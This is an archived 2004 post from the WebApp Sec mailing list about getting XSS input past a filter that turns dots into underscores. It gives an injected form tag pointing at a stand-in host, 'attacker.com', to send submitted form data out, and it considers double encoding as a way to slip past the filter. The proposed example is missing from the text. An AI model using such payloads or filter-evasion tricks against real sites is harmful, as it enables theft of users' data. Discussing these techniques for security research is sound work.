Home page logo

webappsec logo WebApp Sec mailing list archives

Re: Fullstop Substitution in XSS
From: windo () windowlicker dyn ee
Date: Tue, 1 Jun 2004 09:03:04 +0300


My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Of course i dont know how the substitution works, but double encoding like
this MIGHT work:


print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]